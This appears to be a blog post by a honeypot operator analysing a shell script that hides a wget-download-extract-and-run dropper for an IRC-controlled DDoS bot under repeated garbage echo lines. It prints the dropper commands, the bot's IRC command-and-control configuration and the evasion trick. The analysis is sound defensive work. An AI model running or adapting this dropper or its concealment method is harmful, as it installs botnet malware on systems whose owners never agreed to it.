Mystery Malware: An echo powered DDoS Script?

Christmas came early today, and a hacker dropped off a present...a piece of mystery malware.

This piece of malware was dropped onto my Linux honeypot simply named "DDoser".

The file has a 0% detection rate.  Interesting.


This appears to simply be a Linux/UNIX shell script.

It starts with the following line repeated multiple times:

echo "2e61e112030709378914f8280fd09f62e

61e112030709378914f8280fd09f62e61e11203

0709378914f8280fd09f62e61e1120307093789

14f8280fd09f62e61e112030709378914f8280f

d09f6"

And ends with the following lines:
clear
echo
echo "**********************************************"
echo "The Installation Of D3v1Lz T34m Ddoser"
echo "Should Be Running Now On D3v1Lz Ircds"
echo
echo "Make Sure That Ddoser Is Running - Use This Command:"
echo "ps x"
echo
echo "If You See 'addict' Listed, Then It's Running."
echo "You Can Then Fuck Ips Randomly On Your Botnets."
echo "**********************************************"
echo
echo "Enjoy Our Best Services At WebShells Co. , For More"
echo "Info Contact Us On Tech@WShells.Ws Or Call Us On 03-50 12 10"
echo "More Info About Script: Chadi@WShells.Ws"
exit 0
fi
An echo powered DDoS script?  That doesn't make sense...


A closer inspection reveals the true nature of this file...
After repeating the "garbage" echo line multiple times, the following code executes:

#!/bin/sh
clear
wget http://d3v1lz.at.ua/DvLz-T34m.tar.gz
tar -zxvf DvLz-T34m.tar.gz
rm -rf DvLz-T34m.tar.gz
killall -9 addict
mv DvLz-T34m .dt
chmod +x .dt
cd .dt
chmod +x *
./start.sh
clear
cd
rm -rf DvLz-T34m
The file  DvLz-T34m.tar.gz has a 37% detection rate through generic detections... 

This script downloads and installs an apparent DDoS trojan which reports to an IRC command and control center...

File "mech.set"
NICK          DvLz
USERFILE      user
CMDCHAR       .
LOGIN          DvLz
IRCNAME       D3v1Lz T34m Dd0ser
MODES         +ixws
TOG CC        1
TOG CLOAK     1
TOG SPY       1
SET OPMODES   4
SET BANMODES  6
SET AAWAY     1
TOG NOIDLE    1

CHANNEL       #Ddos
TOG PUB       1
TOG MASS      1
TOG SHIT      1
TOG PROT      1
TOG ENFM      1
SET ENFM      +nstm
SET MDL       4
SET MKL       4
SET MBL       4
SET MPL       1

server slain.wshells.ws 6667
So why did the hacker use this script to install the malware, instead of simply directly downloading the malware and installing him/herself?

One possibility is to avoid automated analysis by honeypots.  By uploading a script to the honeypot, instead of the malware itself, any antivirus scans would have ignored the script file.  Furthermore, by burying the script hidden within multiple "garbage" echo lines, the script has the possibility to avoid detection by automated and manual analysis.

With that said, both files have been submitted to AV vendors for analysis and inclusion in their detection signatures.

To the hacker who uploaded this malware to my honeypot...thanks for the early Christmas present!
I'm sorry to say all you're getting is a lump of coal.  And a letter to your ISP.